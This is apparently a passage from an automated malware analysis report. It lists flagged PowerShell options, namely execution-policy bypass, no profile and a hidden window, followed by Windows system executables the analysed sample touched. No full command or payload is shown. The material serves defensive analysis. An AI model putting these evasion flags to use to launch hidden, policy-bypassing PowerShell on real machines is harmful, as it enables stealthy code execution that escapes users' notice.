'htmlcento'))"
option -executionpolicy bypass value Attempts to bypass execution policy
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
option -executionpolicy bypass value Attempts to bypass execution policy
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
option -executionpolicy bypass value Attempts to bypass execution policy
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe